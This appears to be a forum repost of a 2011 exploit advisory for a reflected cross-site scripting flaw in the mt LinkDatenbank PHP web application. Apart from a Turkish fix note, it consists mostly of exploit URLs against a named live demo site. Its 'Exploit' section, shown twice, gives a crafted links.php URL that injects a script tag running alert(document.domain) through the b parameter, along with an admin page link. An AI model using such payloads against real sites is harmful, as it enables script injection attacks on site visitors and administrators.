endLesS
Webmaster
[#] Exploit Title: mt LinkDatenbank Cross Site Script Vulnerability
[#] Author: Err0r
[#] Date: 30.07.2011
[#] E-mail: err0riletisim[MENTION=140012]Gmail[/MENTION].com
[#] Category: Web App.
[#] Note : Warning.
[#] DEMO:http://www.michatronic.de/scripts/demos/mt_linkdb
[#] Price : Free System
[#] Vuln Type: Reflected Cross Site Scripting
[!] Fix : B değişkenine GET \\ ile aktarılanlar Ekrana yazdırılıyor. Araya Filtre konulmalıdır .
##################
[*] Exploit :
# http://www.michatronic.de/scripts/demos/mt_linkdb/links.php?b=**************alert%28document.domain%29</script>
# http://www.michatronic.de/scripts/demos/mt_linkdb/admin.php
###############
[#] Author: Err0r
[#] Date: 30.07.2011
[#] E-mail: err0riletisim[MENTION=140012]Gmail[/MENTION].com
[#] Category: Web App.
[#] Note : Warning.
[#] DEMO:http://www.michatronic.de/scripts/demos/mt_linkdb
[#] Price : Free System
[#] Vuln Type: Reflected Cross Site Scripting
[!] Fix : B değişkenine GET \\ ile aktarılanlar Ekrana yazdırılıyor. Araya Filtre konulmalıdır .
##################
[*] Exploit :
# http://www.michatronic.de/scripts/demos/mt_linkdb/links.php?b=**************alert%28document.domain%29</script>
# http://www.michatronic.de/scripts/demos/mt_linkdb/admin.php
###############